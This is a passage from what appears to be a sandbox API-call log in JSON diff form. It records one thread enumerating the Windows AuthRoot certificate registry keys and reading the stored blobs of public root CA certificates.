"0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" + } + ], + "repeated": 0, + "id": 2897 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "KeyInformation", + "value": "\\xffae\\xffcb\\xffeaM\\xffa1\\xff8f\\xffdb\\x01\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2898 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2899 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43" + } + ], + "repeated": 0, + "id": 2900 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob" + } + ], + "repeated": 1, + "id": 2901 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00t\\x99f\\xce\\xcc\\x95\\xc1\\x87A\\x94\\xcar\\x03\\xf9\\xb6 \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x05c\\xb8c\rb\\xd7Z\\xbb\\xc8\\xab\\x1eK\\xdf\\xb5\\xa8\\x99\\xb2MC\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O_\\x10i09\\x8d\t\\x10{@\\xc3\\xc7\\xca\\x8f\\x1c\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x12\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00E\\xeb\\xa2\\xaf\\xf4\\x92\\xcb\\x821-Q\\x8b\\xa7\\xa7!\\x9d\\xf3m\\xc8\\x0fb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00>\\x90\\x99\\xb5\\x01^\\x8fHl\\x00\\xbc\\xea\\x9d\\x11\\x1e\\xe7!\\xfa\\xba5Z\\x89\\xbc\\xf1\\xdfiV\\x1e=\\xc62\\\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00m\\xca[\\xd0\r\\xcf\\x1c\\x0f2pY\\xd3t\\xb2\\x9c\\xa6\\xe3\\xc5\n\\xa6 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbb\\x03\\x00\\x000\\x82\\x03\\xb70\\x82\\x02\\x9f\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xe7\\xe0\\xe5\\x17\\xd8F\\xfe\\x8f\\xe5`\\xfc\\x1b\\xf0090\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1$0\"\\x06\\x03U\\x04\\x03\\x13\\x1bDigiCert Ass" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob" + } + ], + "repeated": 0, + "id": 2902 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 2903 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "51501FBFCE69189D609CFAF140C576755DCC1FDF" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF" + } + ], + "repeated": 0, + "id": 2904 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob" + } + ], + "repeated": 1, + "id": 2905 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x000\\x1e\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xeb\\x15w\\xb4\\x0b<\\x8b\\xab\\xae4m\\xd9\\x8e\\xad\\x07\\x80\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00QP\\x1f\\xbf\\xcei\\x18\\x9d`\\x9c\\xfa\\xf1@\\xc5vu]\\xcc\\x1f\\xdf\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00[\\xcb\\x93\\xea\\xdb}mO\\xb7\\xa0\n/:\\xe5\\x03\\x0c\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00g\\x0eI,a\\x17\\x9e\\xeb\\xed\\xe0T\\xe7\\x84\\xd9\\x9b\\xadd`seb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xa3\\xcchY]\\xfe~\\x86\\xd8\\xad\\x17r\\xa8\\xb5(J\\xddT\\xac\\xe3\\xb8\\xa7\\x98\\xdfG\\xbc\\xca\\xfb\\x1f\\xdb\\x84\\xdf\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00>\\x00\\x00\\x00H\\x00o\\x00t\\x00s\\x00p\\x00o\\x00t\\x00 \\x002\\x00.\\x000\\x00 \\x00T\\x00r\\x00u\\x00s\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x000\\x003\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xbeR\\xe4a\\xb1}\\xd6%'q%\\x1bE\\xe9\\x8f\\x122\\xca\\xa1%\\x12\\xdcy\\x11\\x8d\\x0c_\\xces\\xa5M\\x95\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O\\xcb\\x14\\xf7\\xc4\\xa3\\x8f/&\\\\x1f\\x12\\xc9\\xafVwY\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00p\\x05\\x00\\x000\\x82\\x05l0\\x82\\x03T\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xb3\\x0fp\\xf2\\x86\\xa43\\xe0\\xb9\t\\x89\\xde\\x01\\xed\\xb70\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000P1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x180\\x16\\x06\\x03U\\x04\n\\x13\\x0fWFA Hotspot 2.01'0%\\x06\\x03U\\x04\\x03" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob" + } + ], + "repeated": 0, + "id": 2906 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 2907 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74" + } + ], + "repeated": 0, + "id": 2908 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob" + } + ], + "repeated": 1, + "id": 2909 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x9ds\\x93y;\\xca2@1u\\xdc\\x12~\\x0e\\xc1\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00s\\xa5\\xe6J;\\xff\\x83\\x16\\xff\\x0e\\xdc\\xcca\\x8a\\x90nN\\xaeMti\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x01\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00r\\xa4\\x91\\x950\\x9f\\xb94\\xd6\n\\x98\\xe4\\xecE\\x1al\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\t\\xcbY\\x7f\\x86\\xb2p\\x8f\\x1a\\xc39\\xe3\\xc0\\xd9\\xe9\\xbf\\xbbM\\xb2#\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x000\\x14\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xc7A\\xf7\\x0fK*\\x8d\\x88\\xbf.q\\xc1A\"\\xefS\\xef\\x10\\xeb\\xa0\\xcf\\xa5\\xe6L\\xfa \\xf4\\x18\\x850s\\xe0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00S\\x00A\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x007\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00A3\\xc4\\xe6\\x0f\\xa1\\x83\\xee^zD\\x16\\xc5\\xd5L3\\x92\\xc5l/W()\\xbfY4tg\\xba\\xb0{\\xcd\\xcf\\x84\\x01b\\x98\\x83A\\xd2\\xd2\\x84\\xfb\\xd8V\\xdfS\\xb1 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xac\\x05\\x00\\x000\\x82\\x05\\xa80\\x82\\x03\\x90\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x1e\\xd3\\x97\t_\\xd8\\xb4\\xb3Gp\\x1e\\xaa\\xbe\\x7fE\\xb30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0c\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1604\\x06\\x03U\\x04\\x03\\x13-Microsof" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob" + } + ], + "repeated": 0, + "id": 2910 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "Index", + "value": "3" + } + ], + "repeated": 0, + "id": 2911 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "742C3192E607E424EB4549542BE1BBC53E6174E2" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2" + } + ], + "repeated": 0, + "id": 2912 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob" + } + ], + "repeated": 1, + "id": 2913 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "h\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00=\\xb6[\\xd9\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827^\\x01\\x02S\\x00\\x00\\x00\\x01\\x00\\x00\\x00$\\x00\\x00\\x000\"0 \\x06\n+\\x06\\x01\\x04\\x01\\x827^\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd7\\xc6;\\xe0\\x83}\\xba\\xbf\\x88\\x1dO\\xbf_\\x98j\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\xfcc]\\xf6&>\r\\xf3%\\xbe_y\\xcdgg\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00F\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00u\\x00b\\x00l\\x00i\\x00c\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00t,1\\x92\\xe6\\x07\\xe4$\\xebEIT+\\xe1\\xbb\\xc5>at\\xe2\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xe7hV4\\xef\\xac\\xf6\\x9a\\xce\\x93\\x9ak%[{O\\xab\\xefB\\x93[P\\xa2e\\xac\\xb5\\xcb`'\\xe4Np~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x10\\xc5\\x1e\\x92\\xd2\\x01 \\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x02\\x00\\x000\\x82\\x02<0\\x82\\x01\\xa5\\x02\\x10p\\xba\\xe4\\x1d\\x10\\xd9)4\\xb68\\xca{\\x03\\xcc\\xba\\xbf0\r\\x06\t" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob" + } + ], + "repeated": 0, + "id": 2914 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "Index", + "value": "4" + } + ], + "repeated": 0, + "id": 2915 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "7E04DE896A3E666D00E687D33FFAD93BE83D349E" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E" + } + ], + "repeated": 0, + "id": 2916 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob" + } + ], + "repeated": 1, + "id": 2917 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xb0\t\\xe9\\x9a\\\\xfc\\x92\\x8a\\x171\\x90\\x10m\\xbb2\\xa9\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00~\\x04\\xde\\x89j>fm\\x00\\xe6\\x87\\xd3?\\xfa\\xd9;\\xe8=4\\x9e\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\xab9\\xed\\xd1\\xa4\\xd8\\x9aU\\x12\\x88-\\xeb\t\\xcb\\x13\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb3\\xdbH\\xa4\\xf9\\xa1\\xc5\\xd8\\xae6A\\xcc\\x11cib)\\xbcK\\xc6b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x001\\xadfH\\xf8\\x10A8\\xc78\\xf3\\x9e\\xa42\\x0139>:\\x18\\xcc\\x02)n\\xf9|*\\xc9\\xefg1\\xd0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x003\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x82\\xc8\\x01\\x999w\"\\xb5z\\xd4s\\xea&k\\x93\\xd4\\x7f\\xfcw\\xfe\\x07\\xf0\\x93\\x884_ 